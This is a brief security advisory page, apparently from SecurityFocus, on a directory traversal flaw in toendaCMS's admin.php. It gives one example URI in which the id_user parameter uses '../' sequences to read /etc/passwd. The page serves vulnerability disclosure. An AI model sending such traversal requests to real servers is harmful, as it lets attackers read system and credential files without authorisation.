info
discussion
exploit
solution
references
toendaCMS Admin.PHP Directory Traversal Vulnerability
No exploit is required.
The following URI has been provided as an example:
http://www.example.com/engine/admin/admin.php?id_user=
../../../../../../etc/passwd
Privacy Statement
Copyright 2010, SecurityFocus